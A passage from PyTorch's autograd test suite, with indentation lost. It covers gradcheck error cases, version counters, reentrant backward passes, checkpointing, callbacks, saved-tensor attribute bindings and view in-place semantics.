check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
# when grad_input is sparse and has incorrect sparse_dim/dense_dim
def check(fast_mode):
def fn(x):
def hook(grad):
if grad is not None:
return grad.to_dense().to_sparse(1)
return grad
y = x.clone()
y.register_hook(hook)
return y.to_dense()
x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (non-sparse case)
def fn2(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (sparse case)
def fn3(x):
y = x.clone().to_dense()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when layout of grad_input is not the same as input
class Test(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
return x.to_sparse()
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when encounter runtime error while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
def check(fast_mode):
def fn(x): # R -> R, C -> C
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
def fn2(x): # R -> C
y = torch.complex(x, x)
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn2, (x,), fast_mode=False)
self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
def fn3(x): # C -> R
y = torch.real(x)
y.register_hook(lambda x: x + 1e-2)
return y
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn3, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
def test_gradcheck_get_numerical_jacobian(self):
# get_numerical_jacobian is deprecated and no longer used internally by gradcheck
from torch.autograd.gradcheck import get_numerical_jacobian
def fn(inputs):
# get_numerical_jacobian requires fn to take inputs as a tuple
# and returns the jacobian wrt the first output
x = inputs[0]
y = inputs[1]
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
from torch.autograd.gradcheck import get_analytical_jacobian
def fn(x, y):
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
outputs = fn(a, b)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
self.assertTrue(reentrant)
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
outputs = NonDetFunc.apply(a, 1e-6)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
self.assertFalse(reentrant)
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_forward_ad(self):
def fn(x, y):
return x + y, y
def bad_fn(x, y):
# Hacky way to check if we're currently inside a forward ad level
is_running_forward_ad = fwAD._current_level >= 0
if is_running_forward_ad:
y_p, y_d = fwAD.unpack_dual(y)
y = fwAD.make_dual(y_p, y_d * 1.1)
return x + y, y
err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"
for fast_mode in [True, False]:
# Test for all inputs and outputs being real
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def basic_mul(x):
return torch.view_as_real(torch.resolve_conj(x * 1j))
gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)
# Test for one input and one output being complex
x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
# Test for all inputs and outputs being complex
y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
code = """import torch
from torch.autograd import Function
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
"""
s = TestCase.runWithPytorchAPIUsageStderr(code)
self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
class DeepReentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
if ctx.x < 0:
return x
with torch.enable_grad():
DeepReentrant.apply(ctx.x).sum().backward()
return x
# Test stack overflow escape mechanism
v = torch.tensor(2000.0, requires_grad=True)
# This will cause stack overflow if reentrant calls are handled
# in the same thread recursively
DeepReentrant.apply(v).sum().backward()
# Test stack overflow escape mechanism multiple times
# to ensure reusing workers in the pool works fine
v2 = torch.tensor(200.0, requires_grad=True)
DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
order = []
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
order.append("MyFunction")
return x
class Reentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
order.append("Reentrant")
if ctx.x < 0:
return x
with torch.enable_grad():
Reentrant.apply(ctx.x).backward()
return x
a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
v = a * b
v.backward()
# The tasks for the Reentrant and MyFunction backward() will be added
# to the queue in the autograd engine at the same time. The backward
# for Reentrant will be executed first, which will then add other
# backward tasks to the queue. We want to ensure all the reentrant tasks
# are prioritized over the MyFunction backward task regardless of their
# sequence numbers
self.assertEqual(len(order), 11)
self.assertEqual(order.count("Reentrant"), 10)
self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
def test_checkpoint_valid_reset_on_error(self):
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
def test_callback_adds_callback(self):
called = [0]
def callback_final():
called[0] += 1
def callback_adds_callback():
called[0] += 1
Variable._execution_engine.queue_callback(callback_final)
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, grad):
Variable._execution_engine.queue_callback(callback_adds_callback)
return grad
a = torch.rand((3, 3), requires_grad=True)
b = MyFunc.apply(a)
b.sum().backward()
self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
# Check that the getter of each type returns what we want
# See `gen_autograd_functions.py` for how the getters are generated
#
# This test is only meant to check if the codegen'd bindings work
# Please help update this test if you update the names of any the fields we check!
#
a = torch.ones(1, requires_grad=True)
b = torch.ones(1, requires_grad=True)
out = torch.stack([a, b], dim=0)
self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor]
self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_tensors[0], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int
self.assertIsInstance(out.grad_fn._saved_dim, int)
out.grad_fn._raw_saved_tensors[0].register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._raw_saved_tensors
self.assertEqual(out.grad_fn._saved_dim, 0)
a = torch.ones(2, 2, requires_grad=True)
indices = torch.tensor([0, 1])
out = a[:, indices]
self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_indices[1], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int]
self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
out.grad_fn._raw_saved_indices[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
out.grad_fn._raw_saved_indices[0].register_hooks(lambda x: x, lambda x: x)
a = torch.ones(2, 2, requires_grad=True)
out = a * a
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after it has been freed"):
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.nn.functional.interpolate(a, 4, mode="linear")
self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]?
self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool
self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]?
out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
self.assertIsNone(out.grad_fn._saved_output_size)
self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
a = torch.ones(2, 2, requires_grad=True)
out = torch.pdist(a, p=1)
self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float
self.assertIsInstance(out.grad_fn._saved_p, float)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.logit(a, 1.)
self.assertEqual(out.grad_fn._saved_eps, 1.) # c10:optional<double> -> float?
self.assertIsInstance(out.grad_fn._saved_eps, float)
out = torch.logit(a)
self.assertIsNone(out.grad_fn._saved_eps)
if torch._C.has_lapack:
a = torch.ones(1, 1, requires_grad=True)
q, r = torch.linalg.qr(a, mode="reduced")
self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str
a = torch.tensor([1.], requires_grad=True)
out = torch.div(a, 2., rounding_mode="trunc")
self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str?
out = torch.div(a, 2., rounding_mode=None)
self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str?
x = torch.zeros(5, requires_grad=True)
out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex
cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex
out = torch.threshold(x, threshold=1., value=1.)
self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float
out = torch.threshold(x, threshold=1, value=1)
self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int
out = torch.threshold(x, threshold=False, value=False)
self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool
a = torch.ones(2, 2, requires_grad=True)
out = a.as_strided((3,), (1,), 1)
self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10:optional<int64_t> -> int?
self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
out = a.as_strided((3,), (1,))
self.assertIsNone(out.grad_fn._saved_storage_offset)
a = torch.ones(2, requires_grad=True)
out = torch.tanh(a)
self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output
a = torch.randn(3, 5, requires_grad=True)
b = torch.tensor([1, 0, 4])
loss = nn.NLLLoss()
out = loss(a, b)
self.assertIsNone(out.grad_fn._saved_weight)
loss = nn.NLLLoss(weight=torch.ones((5,)))
out = loss(a, b)
self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10:optional<Tensor> -> Tensor?
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_weight
def test_cant_create_saved_tensors(self):
with self.assertRaisesRegex(RuntimeError, "Trying to create a SavedTensor object from Python is forbidden"):
torch.autograd.SavedTensor()
def test_custom_function_saved_tensors(self):
def getFn(save=True):
class MyFn(Function):
@staticmethod
def forward(ctx, x):
if save:
ctx.save_for_backward(x, None)
return x
@staticmethod
def backward(ctx, g):
return g
return MyFn
a = torch.randn(5, requires_grad=True)
y = getFn(True).apply(a)
self.assertEqual((a, None), y.grad_fn.saved_tensors)
saved = y.grad_fn._raw_saved_tensors
self.assertIsInstance(saved[0], torch._C._autograd.SavedTensor)
# We can't tell the underlying tensor is None without unpacking it
self.assertIsInstance(saved[1], torch._C._autograd.SavedTensor)
# We catch that error when the user calls register_hooks on it
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
saved[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(1, 1)
saved[0].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "already been set"):
saved[0].register_hooks(lambda x: x, lambda x: x)
y.sum().backward()
# Using a reference to the SavedTensor object after the
# saved variables have been released can lead to undefined behavior
del saved
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn._raw_saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn.saved_tensors
y = getFn(False).apply(a)
self.assertEqual(y.grad_fn.saved_tensors, ())
self.assertEqual(y.grad_fn._raw_saved_tensors, ())
def test_autograd_views_codegen(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks the behavior of two codegen functions (view_as and unbind)
# with respect to view tracking and inplace operation on the output.
def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
def maybe_check_raise(fn, should_raise):
self.assertTrue(should_raise is None or isinstance(should_raise, str))
if should_raise is not None:
with self.assertRaisesRegex(RuntimeError, should_raise):
fn()
else:
fn()
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.view_as(inp)
# Are they differentiable views?
self.assertTrue(out._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.unbind()
# Are they differentiable views?
self.assertTrue(out[0]._is_view() == is_view)
self.assertTrue(out[1]._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
# should_raise contains None if it should not raise
# should_raise contains a string of the error if it should raise
# The 3 elements are for view_as, first output of unbind and second output of unbind
run_test(grad_mode=True, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
inp_change_err = "Output {} of UnbindBackward0 is a view and is being modified inplace."
run_test(grad_mode=True, requires_grad=True, is_view=True,
should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
run_test(grad_mode=False, requires_grad=True, is_view=True,
should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
run_test(grad_mode=False, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks the autograd.Function behavior when we return one or multiple outputs
# while one of these is an input, a view of an input or of a temporary tensor.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
# This indicator is used to check if the argument `ga` contains non-zero values
ga_nz = [False]
class IdOneOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a
@staticmethod
def backward(ctx, ga):
bw_called[0] += 1
return ga, None, None
class IdTwoOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
if ga.eq(0).all():
ga_nz[0] = False
else:
ga_nz[0] = True
return ga + gab, gab, None
class ViewOfTemp(Function):
@staticmethod
def forward(ctx, a, make_view):
ctx.save_for_backward(a)
if make_view:
